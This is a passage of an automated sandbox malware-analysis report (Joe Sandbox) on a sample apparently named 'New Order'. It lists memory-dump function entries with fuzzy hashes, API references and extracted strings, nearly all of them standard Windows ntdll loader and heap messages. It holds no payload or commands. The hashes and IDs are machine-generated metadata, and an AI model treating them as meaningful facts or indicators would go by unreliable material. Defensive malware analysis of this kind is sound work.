                                                                                                                              • Instruction ID: 0c5558b9b4a636f655bbaec76e29c9edd269b3d80c883b280f07c69135124833
                                                                                                                              • Opcode Fuzzy Hash: d741695dd3569e4fa90a579681ae9a34670d743557c2248cea26c83e55b5e217
                                                                                                                              • Instruction Fuzzy Hash: 21313776B4021577EB229A999C55F5BBBBAFBA4B94F094059BB04E7200D270EF00C3E1
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 01842DF0: LdrInitializeThunk.NTDLL ref: 01842DFA
                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01840BA3
                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01840BB6
                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01840D60
                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01840D74
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1404860816-0
                                                                                                                              • Opcode ID: 32800993097451122569fffc98408aec1d88b75f5c3d6f37f5c097b8e5a27930
                                                                                                                              • Instruction ID: 324b1e80f3a4aff40e999eb9bd6048cff68b38e902d3430c91963f6fdbba510a
                                                                                                                              • Opcode Fuzzy Hash: 32800993097451122569fffc98408aec1d88b75f5c3d6f37f5c097b8e5a27930
                                                                                                                              • Instruction Fuzzy Hash: 9D423A75900719DFDB21CF68C880BAAB7F5BF44314F1445A9EA89DB241EB70EA84CF61
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                              • API String ID: 0-379654539
                                                                                                                              • Opcode ID: 428501119cf1d70973560884d8f8d763e10ca204a32ec4b0b5aa84a96d6f21be
                                                                                                                              • Instruction ID: 5ee3b52cc20dc71e0a37f40072e8bfdf7517a10f0d65fc695995a219a736b8c7
                                                                                                                              • Opcode Fuzzy Hash: 428501119cf1d70973560884d8f8d763e10ca204a32ec4b0b5aa84a96d6f21be
                                                                                                                              • Instruction Fuzzy Hash: 52C19C7410878ACFD75ACF68C880B6AB7E4BF84708F044969F995CB291E735CB49CB52
                                                                                                                              Strings
                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01838421
                                                                                                                              • @, xrefs: 01838591
                                                                                                                              • LdrpInitializeProcess, xrefs: 01838422
                                                                                                                              • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0183855E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                              • API String ID: 0-1918872054
                                                                                                                              • Opcode ID: 8a469859718a973caf6af826bb3c017fe29480d6a2f9c8ba78df7a78f59b8693
                                                                                                                              • Instruction ID: d00a205faeb3bc943d26b056b88c0bd29ffa811ea2a978f10d0091199867be40
                                                                                                                              • Opcode Fuzzy Hash: 8a469859718a973caf6af826bb3c017fe29480d6a2f9c8ba78df7a78f59b8693
                                                                                                                              • Instruction Fuzzy Hash: 4E919D71548749AFD722DF25CC80E6BBAE8BB85744F440A2EFA84D2151E734DB448BA3
                                                                                                                              Strings
                                                                                                                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 018721D9, 018722B1
                                                                                                                              • .Local, xrefs: 018328D8
                                                                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 018722B6
                                                                                                                              • SXS: %s() passed the empty activation context, xrefs: 018721DE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                              • API String ID: 0-1239276146
                                                                                                                              • Opcode ID: ad2bea92d1820031a419bb6d557898911dcda175a67065bbbbe3f068c9f0e480
                                                                                                                              • Instruction ID: 89a6864344931651f7c1d94e75dfee5177d8d8f37e1ce78b57eba22db1914d0d
                                                                                                                              • Opcode Fuzzy Hash: ad2bea92d1820031a419bb6d557898911dcda175a67065bbbbe3f068c9f0e480
                                                                                                                              • Instruction Fuzzy Hash: 3FA19D359012299BDB25CF68D884BA9B7B6BF98314F1841E9D908EB251D730DF81CFD1
                                                                                                                              Strings
                                                                                                                              • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0187342A
                                                                                                                              • RtlDeactivateActivationContext, xrefs: 01873425, 01873432, 01873451
                                                                                                                              • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01873437
                                                                                                                              • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01873456
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                                              • API String ID: 0-1245972979
                                                                                                                              • Opcode ID: 762a9fda0fa9dc03271d8bf8c2b1d9673689446fbfcb5cc35dc991d70328559c
                                                                                                                              • Instruction ID: 99de1c422a06b1d805dc27b9a31e3eaf3aaf90ce5c94d5a65e17ef0a51302184
                                                                                                                              • Opcode Fuzzy Hash: 762a9fda0fa9dc03271d8bf8c2b1d9673689446fbfcb5cc35dc991d70328559c
                                                                                                                              • Instruction Fuzzy Hash: 556122366007069BD72ACF1DC881B2AB7E5FFA4B24F188519EC55DB241CB30EA01CBD2
                                                                                                                              Strings
                                                                                                                              • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01860FE5
                                                                                                                              • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0186106B
                                                                                                                              • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 018610AE
                                                                                                                              • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01861028
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                              • API String ID: 0-1468400865
                                                                                                                              • Opcode ID: 1f70b48e44922d9c525de04c02619b4441c4cbb0894a2405ff2a94908a43465e
                                                                                                                              • Instruction ID: 5372cd93f26b4e3b2f11181f7e43f82513d73ae687e59cd5d263fcca0ee6035a
                                                                                                                              • Opcode Fuzzy Hash: 1f70b48e44922d9c525de04c02619b4441c4cbb0894a2405ff2a94908a43465e
                                                                                                                              • Instruction Fuzzy Hash: 5D71CEB19043499FCB62DF18C884F977BA8AF95764F500468F948CB287E735D688CB92
                                                                                                                              Strings
                                                                                                                              • apphelp.dll, xrefs: 01822462
                                                                                                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0186A992
                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0186A9A2
                                                                                                                              • LdrpDynamicShimModule, xrefs: 0186A998
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                              • API String ID: 0-176724104
                                                                                                                              • Opcode ID: b20c1276d35a2d966b1333c7e3e4d4be99ee75874d87f073c806907312da8d66
                                                                                                                              • Instruction ID: 0bb94acd54f12448b67b6659d80231dd601991f887e81d36cae1b3c5dd9167f0
                                                                                                                              • Opcode Fuzzy Hash: b20c1276d35a2d966b1333c7e3e4d4be99ee75874d87f073c806907312da8d66
                                                                                                                              • Instruction Fuzzy Hash: 53315971A00201ABDB369F5DD885E6AB7BAFB84B04F25001EF911F7245D7709B81CF80
                                                                                                                              Strings
                                                                                                                              • HEAP: , xrefs: 01813264
                                                                                                                              • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0181327D
                                                                                                                              • HEAP[%wZ]: , xrefs: 01813255
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                              • API String ID: 0-617086771
                                                                                                                              • Opcode ID: 2c6174c750daec04d0b244a3a051f3e3b69206ddb4b0ca40591feef2b2589f6a
                                                                                                                              • Instruction ID: 255149989574b59d6627537baed293a13a59a5bd73ae7efebf40e210ca6abd83
                                                                                                                              • Opcode Fuzzy Hash: 2c6174c750daec04d0b244a3a051f3e3b69206ddb4b0ca40591feef2b2589f6a
                                                                                                                              • Instruction Fuzzy Hash: 1292BC72A042499FDB25CF68C440BAEBBF6FF48314F188459E849EB35AD734AA45CF50
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                              • API String ID: 0-4253913091
                                                                                                                              • Opcode ID: 2cd96465d25aad1e64d7d7d7f783819d5cb7584534c4c707bf0578128cd39176
                                                                                                                              • Instruction ID: 6f08f812173736be08281aac73a842b9df27c7b1c598a6683b3d6d8dc036d6b7
                                                                                                                              • Opcode Fuzzy Hash: 2cd96465d25aad1e64d7d7d7f783819d5cb7584534c4c707bf0578128cd39176
                                                                                                                              • Instruction Fuzzy Hash: E9F19B71A0060ADFEB25CF68C894B6AB7FAFF44304F148169E516DB385D734EA81CB91
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: $@
                                                                                                                              • API String ID: 0-1077428164
                                                                                                                              • Opcode ID: f05ca17ccca72e91e16cfa24de274160899dc10839f4ec4ad02343ccc44dc921
                                                                                                                              • Instruction ID: 121959c4d56d6271fe043719fe9020a5dbb26d9bfeb18ea54b175bb95b893214
                                                                                                                              • Opcode Fuzzy Hash: f05ca17ccca72e91e16cfa24de274160899dc10839f4ec4ad02343ccc44dc921
                                                                                                                              • Instruction Fuzzy Hash: DCC29F716083559FDB26CF29C880BABBBE5AF98714F04892DF9C9C7241E734DA44CB52
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                              • API String ID: 0-2779062949
                                                                                                                              • Opcode ID: 36ca82d8da647c0796dbc7e3abaf112d2ec8a5f26d9478007833055d965afa7a
                                                                                                                              • Instruction ID: ab8a491542b8b137baf9bcb716cc47f1e111848a9d63bcb67536220637d09bcd
                                                                                                                              • Opcode Fuzzy Hash: 36ca82d8da647c0796dbc7e3abaf112d2ec8a5f26d9478007833055d965afa7a
                                                                                                                              • Instruction Fuzzy Hash: 67A16A759016299BDB719F68CC88BEABBB8EF44700F1001EAEA08E7251D7359F84CF51
                                                                                                                              Strings
                                                                                                                              • LdrpCheckModule, xrefs: 0186A117
                                                                                                                              • Failed to allocated memory for shimmed module list, xrefs: 0186A10F
                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0186A121
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                              • API String ID: 0-161242083
                                                                                                                              • Opcode ID: 2ca8451d484d5d8354f2b51e9b2bec836d2be777171baff77d383c14b49c5452
                                                                                                                              • Instruction ID: 793f3410c555fe526a728b93bec754035b785b8f06b0cdd06526d00c2e703b19
                                                                                                                              • Opcode Fuzzy Hash: 2ca8451d484d5d8354f2b51e9b2bec836d2be777171baff77d383c14b49c5452
                                                                                                                              • Instruction Fuzzy Hash: 747190B5A00609DBDB2ADF6CC985ABEB7F8FB44704F14402DE902E7255E734AB81CB51
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                              • API String ID: 0-1334570610
                                                                                                                              • Opcode ID: 98a927018807a468e7cdc475414b8e4e6369e59e48521230c9b5aa165269117f
                                                                                                                              • Instruction ID: 79deba8033fd5394da245bc3f711d6ea87cc552d150dbba09e01973d1716b54b
                                                                                                                              • Opcode Fuzzy Hash: 98a927018807a468e7cdc475414b8e4e6369e59e48521230c9b5aa165269117f
                                                                                                                              • Instruction Fuzzy Hash: EB61B172600305DFDB29CF28C940B6ABBE9FF45708F14855DE455CB296D770EA81CB91
                                                                                                                              Strings
                                                                                                                              • Failed to reallocate the system dirs string !, xrefs: 018782D7
                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 018782E8
                                                                                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 018782DE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                              • API String ID: 0-1783798831
                                                                                                                              • Opcode ID: 9b7024e0e6c09d72b48b7556c4fcc6b8f787ba6cae2827fcf68b1e0c44981b41
                                                                                                                              • Instruction ID: 8455e521a7b43ea92bdb2d4f7ac68ca48246f16f84c432ca28eb912573770eef
                                                                                                                              • Opcode Fuzzy Hash: 9b7024e0e6c09d72b48b7556c4fcc6b8f787ba6cae2827fcf68b1e0c44981b41
                                                                                                                              • Instruction Fuzzy Hash: B341F0B2540305ABD722EB6CD848F5B77E8AF84750F14492EFA54E3294EB74DA00CBD2
                                                                                                                              Strings
                                                                                                                              • @, xrefs: 018BC1F1
                                                                                                                              • PreferredUILanguages, xrefs: 018BC212
                                                                                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 018BC1C5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                              • API String ID: 0-2968386058
                                                                                                                              • Opcode ID: 46980622456f6774416e6f1f58c1d3a04a98594b1bba38b1e3dc449a16e9458b
                                                                                                                              • Instruction ID: 247a764581b4f9017ca81872359c8791832cebfb0b122956248ac8789976e7ca
                                                                                                                              • Opcode Fuzzy Hash: 46980622456f6774416e6f1f58c1d3a04a98594b1bba38b1e3dc449a16e9458b
                                                                                                                              • Instruction Fuzzy Hash: E7416272E0060EEBEB11DBD8C891FEEBBB8AB14704F14406AEA09F7350D7749B458B51
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                              • API String ID: 0-1373925480
                                                                                                                              • Opcode ID: ded35d823052db470f9a22e4ca208a38b0dedbc178ed24fde6d5b917a9976bf9
                                                                                                                              • Instruction ID: 54297f3dbf8eaf2993df8eecf6dc33401ae9411ea4e76da3954b5aca6538c510
                                                                                                                              • Opcode Fuzzy Hash: ded35d823052db470f9a22e4ca208a38b0dedbc178ed24fde6d5b917a9976bf9
                                                                                                                              • Instruction Fuzzy Hash: DA412672A046488BEF26DBD8CA44BADBBB9FF55344F180499D901EB791DB358B02CB11
                                                                                                                              Strings
                                                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01884899
                                                                                                                              • LdrpCheckRedirection, xrefs: 0188488F
                                                                                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01884888
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                              • API String ID: 0-3154609507
                                                                                                                              • Opcode ID: 11065b607ee6af15567f2e4fa2e74b166c79d781f5b76ede48d983fdb1bd96bc
                                                                                                                              • Instruction ID: 1aabd870db46bf3f26d9ccaa59abf1040e73aee3c6cfa9781a670716ad550576
                                                                                                                              • Opcode Fuzzy Hash: 11065b607ee6af15567f2e4fa2e74b166c79d781f5b76ede48d983fdb1bd96bc
                                                                                                                              • Instruction Fuzzy Hash: 0A41D133A102568BCB21FE1CD940B26BBE4BF49B54F06026DED48E7312E730EA00CB91
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                              • API String ID: 0-2558761708
                                                                                                                              • Opcode ID: 339e6b037d4c4349935a517f397917a43e542e375e1ce42e1bc15714b77c7c2a
                                                                                                                              • Instruction ID: 93e43523e2c189f6760efbd52cab3c0507f44658beef9c09ac5b916aee0910ad
                                                                                                                              • Opcode Fuzzy Hash: 339e6b037d4c4349935a517f397917a43e542e375e1ce42e1bc15714b77c7c2a
                                                                                                                              • Instruction Fuzzy Hash: 0A11D2B2315106DFD719CA18C894F66F3A8EF40B59F18815DF406CB259DB34DA80C751
                                                                                                                              Strings
                                                                                                                              • Process initialization failed with status 0x%08lx, xrefs: 018820F3
                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01882104
                                                                                                                              • LdrpInitializationFailure, xrefs: 018820FA
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                              • API String ID: 0-2986994758
                                                                                                                              • Opcode ID: ea9d4d16eb4290bfdaecab639244dadf1eff68fb0ed81b90529629d1b7792c90
                                                                                                                              • Instruction ID: dedf86292b0240d71f240dc1f9750d808a0036d2ec892b91cd5e207af72d98b8
                                                                                                                              • Opcode Fuzzy Hash: ea9d4d16eb4290bfdaecab639244dadf1eff68fb0ed81b90529629d1b7792c90
                                                                                                                              • Instruction Fuzzy Hash: F2F0C279680708ABE724E64CCC56F9977ADFB44B54F60006DFA00EB682D6B0BB40CA91
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ___swprintf_l
                                                                                                                              • String ID: #%u
                                                                                                                              • API String ID: 48624451-232158463
                                                                                                                              • Opcode ID: c67dae3fbd118639b0a8e6dbdec8e6c490926f9dc624566fc04f0d86ae25ca43
                                                                                                                              • Instruction ID: 63f137d6876da51e3eeb74cf5c3ef1c1e7e39a9f44be5834b9a45bba5f701738
                                                                                                                              • Opcode Fuzzy Hash: c67dae3fbd118639b0a8e6dbdec8e6c490926f9dc624566fc04f0d86ae25ca43
                                                                                                                              • Instruction Fuzzy Hash: D7713A72A0014A9FDB01DFA8C990BAEB7F8FF18704F144065E905EB255EA34EE41CBA1
                                                                                                                              Strings
                                                                                                                              • LdrResSearchResource Exit, xrefs: 0180AA25
                                                                                                                              • LdrResSearchResource Enter, xrefs: 0180AA13
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                              • API String ID: 0-4066393604
                                                                                                                              • Opcode ID: d4a640270a38aad54be8ebc7a90d9e0b73e3f4eb5846ecf1f63e21522b9ec6f5
                                                                                                                              • Instruction ID: 222be1ef098984274dd266c9d35e7f7b9aea9026275cd4b1c59f07dfa53f8659
                                                                                                                              • Opcode Fuzzy Hash: d4a640270a38aad54be8ebc7a90d9e0b73e3f4eb5846ecf1f63e21522b9ec6f5
                                                                                                                              • Instruction Fuzzy Hash: F4E17C71A0071DAFEF66CA9CCD90BAEBBBABF44314F14442AE901E7291D7349A41CB51
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: `$`
                                                                                                                              • API String ID: 0-197956300
                                                                                                                              • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                              • Instruction ID: 018a78f0eff22b5f4842b94bed6e9f5932958b45289e75d576c61db92a2ebc1f
                                                                                                                              • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                              • Instruction Fuzzy Hash: A9C1D53120434A9BE729CF28C841B6BBBE5BFD4B18F144A2DF696C7290E775D605CB42
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID: Legacy$UEFI
                                                                                                                              • API String ID: 2994545307-634100481
                                                                                                                              • Opcode ID: ce1f5f30ae583032aa4ff184d028988e58fa05d5fff7374e9e0abedbb25b77cb
                                                                                                                              • Instruction ID: b00dd2c78e810bdd62b585d490f26c1e811f0e1b75670026d415b42ee46a09fc
                                                                                                                              • Opcode Fuzzy Hash: ce1f5f30ae583032aa4ff184d028988e58fa05d5fff7374e9e0abedbb25b77cb
                                                                                                                              • Instruction Fuzzy Hash: 33615D71E043199FDB15DFA8C840BAEBBB9FB48744F1440ADE649EB251DB31EA40CB50
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: @$MUI
                                                                                                                              • API String ID: 0-17815947
                                                                                                                              • Opcode ID: 8607675cbd169dbc8deb7038d471d696a7b4919d34a24df69e58e05cabca2abb
                                                                                                                              • Instruction ID: 4d8c0838df7c4eb6e7a686406848c759e39313d918542ba783660d93dc01a369
                                                                                                                              • Opcode Fuzzy Hash: 8607675cbd169dbc8deb7038d471d696a7b4919d34a24df69e58e05cabca2abb
                                                                                                                              • Instruction Fuzzy Hash: 4B513971D0161DAFEF11DFA9CC80AEEBBB9EB44754F54052AFA11F7280D6709A05CB60
                                                                                                                              Strings
                                                                                                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0180063D
                                                                                                                              • kLsE, xrefs: 01800540
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
